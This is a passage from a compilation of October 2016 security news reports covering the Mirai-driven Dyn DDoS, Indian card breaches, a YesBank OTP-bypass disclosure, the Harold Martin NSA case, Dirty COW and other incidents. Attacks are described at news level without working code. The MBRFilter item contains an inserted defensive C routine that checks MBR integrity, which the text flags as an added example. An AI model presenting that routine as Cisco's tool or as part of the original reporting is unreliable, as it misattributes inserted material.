A.P. Hota, NPCI Chief Executive, explained that one of the payment switch provider’s systems might have been compromised. Looking closely at the numbers behind this security breach, which involved some 90 ATMs, 2.65 million of the cards are on the Visa and MasterCard platforms.

Both Visa and Mastercard issued a statement to confirm that their networks had not been hacked and confirmed their support to the ongoing investigation.

The switches are crucial components of the back-end network of a bank and are involved in ordinary ATM operations.


The card network providers already reported the issue to the affected banks that decided as a preventive measure to replace customers’ cards.

“Necessary corrective actions already have been taken and hence there is no reason for bank customers to panic.” said Hota, downplaying the problem.

According to Reuters, the NPCI did not disclose the name of the payment switch provider that was compromised; however, banking industry sources revealed that the provider is the Hitachi Ltd subsidiary Hitachi Payment Services, which manages ATM network processing for Yes Bank Ltd.

Yes Bank issued a statement to confirm it is reviewing the security, but its experts haven’t found any anomaly.

The State Bank of India promptly blocked the debit cards of some customers and is now replacing those cards to prevent fraudulent activities.

Reuters provided further details about the possible impact on Indian bank customers:

“Complaints of fraudulent cash withdrawals affected a total 641 customers of 19 banks, and the money involved was 13 million rupees ($194,612), according to NPCI.” reported Reuters.

“ICICI Bank (ICBK.NS), HDFC Bank (HDBK.NS) and Axis Bank (AXBK.NS) – the top three private sector lenders – confirmed in separate statements some of their customers’ card accounts had been possibly breached after use at outside ATMs. The banks said they had advised the clients to change their PINs.”

“Standard Chartered’s (STAN.L) Indian unit has also begun to re-issue debit cards for some customers”

An Army of Million Hacked IoT Devices Almost Broke the Internet Today
22.10.2016 thehackernews Hacking
A massive Distributed Denial of Service (DDoS) attack against Dyn, a major domain name system (DNS) provider, broke large portions of the Internet on Friday, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
But how did the attack happen? What's the cause behind the attack?
Exact details of the attack remain vague, but Dyn reported a huge army of hijacked internet-connected devices could be responsible for the massive attack.
Yes, the same method recently employed by hackers to carry out record-breaking DDoS attack of over 1 Tbps against France-based hosting provider OVH.
According to security intelligence firm Flashpoint, Mirai bots were detected driving much, but not necessarily all, of the traffic in the DDoS attacks against DynDNS.
Mirai is a piece of malware that targets Internet of Things (IoT) devices such as routers, and security cameras, DVRs, and enslaves vast numbers of these compromised devices into a botnet, which is then used to conduct DDoS attacks.
Since the source code of the Mirai botnet has already been made available to the public, anyone can wield DDoS attacks against targets.
This time hackers did not target an individual site; rather, they attacked Dyn, which many sites and services use as their upstream DNS provider for mapping between human-readable website names and internet protocol (IP) addresses.
The result we all know: Major sites and services including Twitter, GitHub, Reddit, PayPal, Amazon, AirBnb, Netflix, Pinterest, and so on, were among hundreds of services rendered inaccessible to Millions of people worldwide for several hours on Friday.
"Flashpoint has confirmed that at least some of the devices used in the Dyn DNS attacks are DVRs, further matching the technical indicators and tactics, techniques, and procedures associated with previous known Mirai botnet attacks," Flashpoint says in a blog post.
This type of attack is notable and concerning because it largely consists of unsecured IoT devices, which are growing exponentially with time. These devices are implemented in a way that they cannot easily be updated and thus are nearly impossible to secure.
Manufacturers majorly focus on performance and usability of IoT devices but ignore security measures and encryption mechanisms, which is why they are routinely being hacked and widely becoming part of DDoS botnets used as weapons in cyber attacks.
An online tracker of the Mirai botnet suggests there are more than 1.2 Million Mirai-infected devices on the Internet, with over 166,000 devices active right now.
In short, IoT botnets like Mirai are growing rapidly, and there is no easy way to stop them.
According to officials speaking to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks hitting DynDNS, but none of the agencies yet speculated on who might be behind them.

Massive DDoS attack against Dyn DNS service, how and why
22.10.2016 securityaffairs Attack

A massive DDoS attack targeted the Dyn DNS service and caused an extended Internet outage. How did the attackers power the attack?
Yesterday a massive DDoS attack targeted the DNS service of the Dyn company, one of the leading domain name system (DNS) providers, and caused an extended Internet outage. A large portion of Internet users was not able to reach the most important web services; many websites including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.

What happened? Who is behind the attack?

The fear of a cyber attack on a global scale caused panic; yesterday a large portion of users probably understood that the Internet architecture is a resource that could be targeted by hackers with serious and unpredictable consequences.

But how did the attack happen? What’s the cause behind the attack?

We still do not know the exact dynamics of the attack, nor who is responsible; the only certainty is that the Dyn DNS Service was flooded by a devastating wave of requests originating from millions of compromised IoT devices. The Dyn company reported that a huge army of hijacked Internet of Things devices could have been abused by attackers to power the massive DDoS attack.

The news confirms the dangerous trend observed in the recent attacks against Brian Krebs’s website and the French hosting provider OVH, which peaked at 1 Tbps.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which it confirms that its experts observed Mirai bots driving the attack against DynDNS.

“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “

Below are the Key Findings of the report published by Flashpoint:

Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
This is not surprising if we consider that the source code of the botnet was leaked on the popular criminal hacker forum Hackforums earlier in October by a user with the moniker “Anna-senpai”, who shared the link to the source code of the malware “Mirai.”

“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.

The Mirai botnet was first spotted by the researcher MalwareMustDie this summer targeting IoT devices; it mainly targets connected objects such as routers, CCTV cameras, and DVRs.

The Mirai malware targets Internet of Things (IoT) devices that still use factory-default credentials, a circumstance that is quite common in the wild.

The availability of the Mirai botnet source code in the wild theoretically made it possible for anyone to power a botnet.

I confess that I believe the leak of the source code of this kind of botnet could also be part of a wider strategy of a certain category of attackers that intend to power massive attacks while making attribution impossible.

Watch out! The Mirai botnet that powered the attack against the Dyn DNS service is not the same used against Krebs’s site and OVH.

“While Flashpoint has confirmed that Mirai botnets were used in the October 21, 2016 attack against Dyn, they were separate and distinct botnets from those used to execute the DDoS attacks against “Krebs on Security” and OVH. Earlier this month, “Anna_Senpai,” the hacker operating the large Mirai botnet used in the Krebs DDoS, released Mirai’s source code online.” continues Flashpoint “Since this release, copycat hackers have used the malware to create botnets of their own in order to launch DDoS attacks.”

It is unknown if the attacks against Dyn DNS are linked to the DDoS attacks against Krebs, OVH, or other previous attacks.

An attack against a DNS provider aims to obtain a wide effect; in this specific case, many sites and services use Dyn as their upstream DNS provider.

If you are interested to know more about the diffusion of the Mirai Botnet you can use this online tracker that reports more than 1.2 Million connected devices infected by the Mirai code in the wild.

According to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks against the Dyn DNS service.

We have no indication about the possible culprit. I personally believe that the leak of the Mirai botnet in the wild and this last massive attack have something in common, and that there is a specific strategy of a persistent attacker behind the events.

Chinese hackers targeted officials visiting the USS Ronald Reagan vessel
22.10.2016 securityaffairs Hacking

Experts from the cyber security firm FireEye discovered a spear phishing campaign launched against visitors to the Ronald Reagan vessel in South China Sea.
Chinese hackers targeted foreign government personnel who visited a US aircraft carrier the day before a contentious international court ruling on the South China Sea.

According to the cyber security firm FireEye, Chinese hackers targeted a US aircraft carrier. The hackers launched an attack against visitors to a US vessel the day before (July 11, 2016) a contentious international court ruling on the South China Sea.
According to the experts at FireEye’s iSight unit, the Chinese hackers powered a spear phishing attack that leveraged messages with a malicious document as an attachment. The document impersonated an official message addressed to officials visiting the USS Ronald Reagan, a nuclear-powered aircraft carrier which conducted patrols of the South China Sea in July.


The document appears as an official message that was sent to officials visiting the nuclear-powered aircraft carrier USS Ronald Reagan. The Ronald Reagan aircraft carrier was used by the US Government to patrol the South China Sea in July.

The document allowed the attacker to infect victims with the Enfal malware, which can be used by attackers as a spyware or to download further malicious payloads on the machine.

According to FireEye, the same hackers are responsible for other attacks against US and Vietnamese national defence computer networks.

The Financial Times, which reported the discovery made by FireEye, confirmed the absence of direct evidence linking the attack to a Chinese nation-state actor. The researchers discovered that the command and control server used by the attacker had already been used in the past by the China-based group.

“Many governments and militaries in Southeast Asia lack cyber security controls that can effectively match these elevated threats,” said Bryce Boland, FireEye’s Asia-Pacific chief technology officer.

“For example, personal webmail and unmanaged devices aren’t unusual, and many organisations lack the technology to detect unique attacks which haven’t been seen before.”

At the time of writing, it is still unclear whether the hackers compromised classified information or interfered with the vessel’s operations in the South China Sea.

“The official said unclassified information about logistics was often shared with contractors and foreign governments to support port visits for ships.” reported the FT.

Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
21.10.2016 thehackernews Attack
Cyber attacks are becoming a worse nightmare for companies day by day, and the Distributed Denial of Service (DDoS) attack is one such attack that can cause massive damage to any service.
Recently, the Internet witnessed a record-breaking DDoS attack of over 1 Tbps against France-based hosting provider OVH, and now the latest victim of this kind of attack is none other than the DNS provider Dyn.
A sudden outage of popular sites and services, including Twitter, SoundCloud, Spotify, and Shopify, for many users, is causing uproar online. It's because of a DDoS attack against the popular Domain Name System (DNS) service provider Dyn, according to a post on Ycombinator.
DNS acts as the authoritative reference for mapping domain names to IP addresses. In other words, DNS is simply the Internet's phone book that resolves human-readable web addresses, like thehackernews.com, to IP addresses.
Dyn DNS is used by many websites and services as their upstream DNS provider, including Twitter, Spotify, SaneBox, Reddit, Box, Github, Zoho CRM, PayPal, Airbnb, Freshbooks, Wired.com, Pinterest, Heroku and Vox Media properties.
All of these sites and services are reportedly experiencing outages and downtime, either completely or partially.
Here's an internet outage map from Level3:
According to Dyn DNS, the DDoS started at 11:10 UTC and is mostly affecting its customers on the East Coast of the United States, specifically Managed DNS customers.
"We are aware of the ongoing service interruption of our Managed DNS network. For more information visit our status page," Dyn tweeted.
At the time, it's not clear who is behind this DDoS attack, but the company said its engineers are working on "mitigating" the issue.
Here's the statement posted by Dyn on its website:
"This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.
Customers with questions or concerns are encouraged to reach out to our Technical Support Team."
What websites are down for you? Let us know in the comments below.
We'll update the story as soon as we get to hear more about the attack. Stay Tuned!

US users were not able to reach Twitter and other sites due to DDoS on Dyn DNS Service
21.10.2016 securityaffairs Attack

A severe distributed denial-of-service (DDoS) attack is targeting the Managed DNS infrastructure of cloud-based Internet performance management company Dyn.

Many users are not able to reach major web services. The list of affected websites includes Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom, and Heroku.

GitHub has notified its users that its upstream DNS provider is suffering a serious issue. In some regions of the planet Twitter.com was not accessible, as reported by SecurityWeek.

“At the time of writing, website availability services show that Twitter.com has been down for roughly two hours.” states a blog post published by SecurityWeek.

Dyn confirmed the DDoS attack against its DNS service that started at 11:10 UTC. The company is still working on mitigating the attack.

“Services have been restored to normal as of 13:20 UTC.

This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.”

The attack seems to have had no impact on European and Asian users; I live in Italy and here we had no problems reaching the affected websites.

DDoS attacks continue to represent a serious threat against the web services and the overall Internet infrastructure.

Recent attacks powered by the Mirai botnet reached a magnitude never seen before; the attack targeting hosting provider OVH last month peaked at 1 Tbps.

In early September the popular cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet” that reveals an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.

We are referring to coordinated attacks that experts consider a sort of test to evaluate the resilience of the most critical nodes of the global Internet. The attacks experienced by these companies require significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker like a government, and China is the first suspect.

“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.

“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.”

It is clear that attackers aim to cause a global blackout of the most common top-level domains, paralyzing a large portion of the Internet.

Schneier, who has spoken with companies that faced the attacks, pointed out that these powerful DDoS attacks stand out from the ordinary for their methodically escalating nature.

Cyber criminals can easily get access to your YesBank Internet Banking using a stolen Debit/Credit Card Number and PIN
21.10.2016 securityaffairs Cyber

A security researcher disclosed a vulnerability in the online banking service of YesBank, which promptly fixed the issue.
I am a customer of YesBank and I hold my savings account with them. I also use the YesBank’s online banking application and I strongly feel that the application of the bank must be secured. So, as a responsible client, I disclosed the vulnerability to YesBank which I recently found in their application. And I would like to thank YesBank for fixing this issue immediately.
For those who do not know about YesBank, you can read about the bank on wiki.
“YES BANK is India’s fifth largest private sector Bank, founded in 2004. Yes Bank is the only Greenfield Bank licence awarded by the RBI in the last two decades. YES BANK is a “Full Service Commercial Bank”, and has steadily built a Corporate, Retail & SME Banking franchise, Financial Markets, Investment Banking, Corporate Finance, Branch Banking, Business and Transaction Banking, and Wealth Management business lines across the country.”
I regularly perform penetration testing on applications at SecureLayer7 and recently I stumbled on a very simple bug in the YesBank online banking application (referred to as YesBank in the remainder of this article). YesBank provides a good number of features to millions of banking users. Among these features, I found that the user account password reset feature was vulnerable to one of the OWASP Top 3 vulnerabilities, i.e. injection.

This vulnerability is caused by poor input validation in the application. Consequently, an attacker can exploit it to bypass the OTP process and reset the bank account password. To exploit this vulnerability, the attacker needs information about the victim's bank account, for example their ATM card number, ATM PIN, etc.
Several Indian banks are issuing advisories to their customers, asking them to change their security code (more popularly known as the ATM PIN) or, better, replace the card, according to Indian media reports.
Once the attacker has gathered all the information required to exploit this vulnerability, he can gain access to the Online Banking Application account by resetting the user's original password.

The Proof of Concept
To execute the payload successfully, switch off or turn on flight mode on the mobile. (Banking user information is blurred for security reasons.)

Vulnerability Timeline:
1) Vulnerability reported on 21st of Sept, 2016 to YesBank

2) Re-tested Vulnerability on 20th October 2016 and it was patched

I always recommend implementing universal input validation for the commonly known vulnerabilities; banking applications in particular should validate all types of untrusted user input.

Reference: http://blog.securelayer7.net/yesbank-banking-application-password-reset-otp-bypass-vulnerability/

US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers

The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.

The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to a court complaint, the stolen data includes source code developed by the NSA for its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton, the same defense contractor that employed the notorious Edward Snowden at the time the whistleblower disclosed the mass surveillance program conducted by the NSA on a global scale.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data that the suspect had stolen from government systems since 1996.

According to the prosecutors, Harold Thomas Martin III has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”

“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said. “The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,”

“The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.


The volume of classified information stolen by the man could be far larger than Edward Snowden’s cyber heist. The investigators have discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”

“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”

The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group who claimed the responsibility for the Equation Group hack.

According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.

Why did the US contractor steal the document?

It is still a mystery. People who know him describe him as patriotic, a circumstance that suggests he would never have given classified information to another country. He never had a specific interest in politics, and the FBI doesn’t exclude that he might have sold the precious information for money.

“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.

Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing today in Baltimore.

Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data, at least 500 million pages of government records, includes top-secret information about "national defense." If all the data stolen by Martin is indeed found to be classified, it would be the largest NSA heist, far bigger than the Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also includes the personal information of government employees. The stolen documents date from 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up, and the government also plans to charge him with violations of the Espionage Act, prosecutors said.
If convicted, he could face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption as well as secure communications.
A US Navy veteran, Martin allegedly used sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It's believed that Martin was using the TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN that would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the information security practices of the government and referred to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.

MBRFilter — Open Source Tool to Protect Against 'Master Boot Record' Malware
21.10.2016 thehackernews Virus
The ransomware threat has risen exponentially, so much so that ransomware authors have started abusing the MBR in their attacks to lock down your entire computer instead of just encrypting the important files on your hard drive.
The Talos team at Cisco Systems has released a free, open-source tool that protects the master boot record (MBR) sector of computers from modification by bootkits, ransomware, and other malicious attacks.
The Master Boot Record (MBR) is the first sector (512 bytes) of your hard drive and stores the bootloader, the piece of code responsible for booting the current operating system.
Technically, the bootloader is the first code that gets executed after the system BIOS, and it tells your computer what to do when it starts.
Advanced malware such as rootkits and bootkits leverages this process to infect computers by modifying the MBR.
Boot malware, or a bootkit, can install ransomware or other malicious software into your Windows kernel, where it is almost impossible to detect, and thus takes unrestricted and unauthorized access to your entire computer.
So the best way to protect your computer against such bootkits is to prevent unauthorized software from rewriting or overwriting your MBR.
Cisco Talos's free tool does exactly that.
Dubbed MBRFilter, the tool is nothing more than a signed system driver that puts the MBR into a read-only state, preventing any software or malware from modifying data in the MBR sector.
You can watch the video demonstration of MBRFilter in action.

MBRFilter will safeguard your computer against MBR-targeting malware, like the Petya, Satana, or HDDCryptor ransomware.
"MBRFilter is a simple disk filter based on Microsoft’s diskperf and classpnp example drivers," the team said in a blog post. "It can be used to prevent malware from writing to Sector 0 on all disk devices connected to a system. Once installed, the system will need to be booted into Safe Mode in order for Sector 0 of the disk to become accessible for modification."
MBRFilter is available for both Windows 32-bit and 64-bit platforms, and Cisco has open-sourced its source code on GitHub.
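MBRFilter blocks writes to sector 0; the complementary check a defender wants is to notice when that sector has already been rewritten. The following is an added example, not part of the Cisco Talos tool or of the article: it decodes the 512-byte layout described above (boot code, four 16-byte partition entries, the 0x55AA signature) and compares the boot-code and partition-table regions against a known-good baseline. The constructed sample sector, the FNV-1a checksum and the classic 446-byte boot-code layout are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define MBR_SIZE        512
#define MBR_PART_TABLE  446  /* classic layout assumed: boot code is bytes 0..445 */
#define MBR_PART_COUNT  4
#define MBR_PART_SIZE   16
#define MBR_TABLE_BYTES (MBR_PART_COUNT * MBR_PART_SIZE)

struct mbr_partition {
    uint8_t  bootable;      /* 0x80 marks the active partition */
    uint8_t  type;          /* 0x00 means the entry is unused */
    uint32_t lba_start;     /* first sector, little-endian on disk */
    uint32_t sector_count;  /* length in sectors, little-endian on disk */
};

enum mbr_status {
    MBR_OK = 0,
    MBR_BAD_SIGNATURE,      /* bytes 510..511 are not 0x55 0xAA */
    MBR_BOOTCODE_CHANGED,   /* bootloader region differs from the baseline */
    MBR_PARTITIONS_CHANGED  /* partition table differs from the baseline */
};

/* Known-good checksums of the two regions an MBR bootkit has to rewrite. */
struct mbr_baseline { uint32_t bootcode_hash; uint32_t table_hash; };

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* FNV-1a (32-bit) serves as a compact, dependency-free checksum here; a
 * production baseline would use a cryptographic hash instead. */
uint32_t fnv1a32(const uint8_t *p, size_t n)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 16777619u;
    }
    return h;
}

int mbr_has_signature(const uint8_t *mbr)
{
    return mbr[510] == 0x55 && mbr[511] == 0xAA;
}

/* Decode the four 16-byte partition entries; returns how many are in use. */
int mbr_parse_partitions(const uint8_t *mbr, struct mbr_partition out[MBR_PART_COUNT])
{
    int used = 0;
    for (int i = 0; i < MBR_PART_COUNT; i++) {
        const uint8_t *e = mbr + MBR_PART_TABLE + i * MBR_PART_SIZE;
        out[i].bootable     = e[0];
        out[i].type         = e[4];
        out[i].lba_start    = rd_le32(e + 8);
        out[i].sector_count = rd_le32(e + 12);
        if (out[i].type != 0)
            used++;
    }
    return used;
}

/* Record the known-good state; run this once on a clean system. */
void mbr_take_baseline(const uint8_t *mbr, struct mbr_baseline *b)
{
    b->bootcode_hash = fnv1a32(mbr, MBR_PART_TABLE);
    b->table_hash    = fnv1a32(mbr + MBR_PART_TABLE, MBR_TABLE_BYTES);
}

/* Compare a freshly read sector against the baseline; the result names the
 * region that moved so an analyst knows where to look first. */
enum mbr_status mbr_check(const uint8_t *mbr, const struct mbr_baseline *b)
{
    if (!mbr_has_signature(mbr))
        return MBR_BAD_SIGNATURE;
    if (fnv1a32(mbr, MBR_PART_TABLE) != b->bootcode_hash)
        return MBR_BOOTCODE_CHANGED;
    if (fnv1a32(mbr + MBR_PART_TABLE, MBR_TABLE_BYTES) != b->table_hash)
        return MBR_PARTITIONS_CHANGED;
    return MBR_OK;
}

/* Constructed sample sector (not a real bootloader): filler boot code, one
 * active type-0x07 partition at LBA 2048 (0x800) spanning 1048576 (0x100000)
 * sectors, and a valid 0x55AA signature. */
void build_sample_mbr(uint8_t *mbr)
{
    static const uint8_t entry[MBR_PART_SIZE] = {
        0x80, 0x00, 0x00, 0x00,   /* active flag, CHS start (unused here) */
        0x07, 0x00, 0x00, 0x00,   /* type 0x07, CHS end (unused here) */
        0x00, 0x08, 0x00, 0x00,   /* LBA start 2048, little-endian */
        0x00, 0x00, 0x10, 0x00    /* sector count 1048576, little-endian */
    };
    memset(mbr, 0, MBR_SIZE);
    for (int i = 0; i < MBR_PART_TABLE; i++)
        mbr[i] = (uint8_t)(0x90 + (i & 7));
    memcpy(mbr + MBR_PART_TABLE, entry, MBR_PART_SIZE);
    mbr[510] = 0x55;
    mbr[511] = 0xAA;
}
```

On a live Windows host the sector is read from \\.\PhysicalDrive0 with administrative rights, and the baseline must be taken while the system is known to be clean.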

Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach
21.10.2016 thehackernews Hacking
2016 is the year of data breaches, with almost every major company falling victim to cyber attacks, resulting in the compromise of over a billion online user accounts.
Weebly and Foursquare are the latest victims of the massive data breach, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.
Details of over 43 million users have been stolen from the San Francisco-based website building service Weebly, according to breach notification site LeakedSource, which had already indexed a copy of the stolen data that it received from an anonymous source.
In addition, LeakedSource posted details of the cyber attack in a blog post on Thursday explaining what happened. The attack is believed to have been carried out in February 2016.
"Unlike nearly every other hack, the Co-founder and CTO of Weebly Chris Fanini fortunately did not have his head buried deeply in the sand and actually responded to our communication requests," LeakedSource says.
"We have been working with them to ensure the security of their users meaning password resets as well as notification emails are now being sent out."
The stolen data contains personal data of 43,430,316 Weebly customers, which includes usernames, email addresses, passwords, and IP addresses.
Stolen passwords were stored using the strong hashing function bcrypt, making it difficult for hackers to obtain users' actual passwords.
These password hashes are also believed to have used a salt – a random string added to the hashing process – to further strengthen the stored passwords and make them more difficult for hackers to crack.
Weebly confirmed the data breach, saying the company has started notifying affected customers and has already initiated a password reset process and new password requirements.
"Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers," the company said.
"At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident."
LeakedSource has also published details of a data breach affecting more than 22.5 million customers of location-based check-in service Foursquare, though the company denied the claims.
The Takeaway:
Even if the stolen passwords are much more difficult to crack, it's still a good idea to change the password for your Weebly account, just to be safe.
Also change passwords for other online accounts immediately, especially if you use the same password for multiple websites.
You can also use a good password manager to create and remember complex passwords for different sites. We have listed some best password managers that would help you understand the importance of password manager and choose one according to your requirement.

The new Dirty COW Linux Kernel Exploit already used in attacks in the wild
21.10.2016 securityaffairs Vulnerebility

Experts disclosed a new Linux kernel vulnerability dubbed Dirty COW that could be exploited by an unprivileged local attacker to escalate privileges.
The security expert Phil Oester discovered a new flaw in the Linux kernel, dubbed ‘Dirty COW’, that could be exploited by a local attacker to escalate privileges.

The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.

According to the security advisory published by Red Hat, the vulnerability, tracked as CVE-2016-5195, allows local attackers to modify existing setuid files.

“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.” states the Red Hat security advisory.

“This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.”


Red Hat also confirmed that attackers are using an exploit leveraging the Dirty COW in the wild.

The good news is that a solution to the issue is already available and Linux distributions have started releasing updates.

There is also a curious aspect of Dirty COW: the researchers who discovered it launched a sort of marketing operation around the issue, creating a website, a logo and a Twitter account. They are also running a shop that sells “Dirty COW” mugs and t-shirts.

Let me close with one of the questions in the FAQ section of the website:

Can my antivirus detect or block this attack?

“Although the attack can happen in different layers, antivirus signatures that detect Dirty COW could be developed. Due to the attack complexity, differentiating between legitimate use and attack cannot be done easily, but the attack may be detected by comparing the size of the binary against the size of the original binary. This implies that antivirus can be programmed to detect the attack but not to block it unless binaries are blocked altogether.”

The researchers also published the exploit code on GitHub.

FruityArmor APT exploited Windows Zero-Day flaws in attacks in the wild
21.10.2016 securityaffairs APT

Experts from Kaspersky have discovered a new APT dubbed FruityArmor APT using a zero-day vulnerability patched this month by Microsoft.
A new APT group, dubbed FruityArmor, targeted activists, researchers, and individuals related to government organizations.
According to experts at Kaspersky Lab, the FruityArmor APT conducted targeted attacks leveraging a Windows zero-day vulnerability, tracked as CVE-2016-3393, recently patched by Microsoft.

The security bulletins issued by Microsoft in October patched four zero-day flaws, including CVE-2016-3393, which is a remote code execution vulnerability.


The experts have observed victims in different countries, including Iran, Algeria, Thailand, Yemen, Saudi Arabia and Sweden.

According to Kaspersky Lab, the hackers behind FruityArmor exploited several zero-day vulnerabilities and used an attack platform built around the Microsoft PowerShell framework.

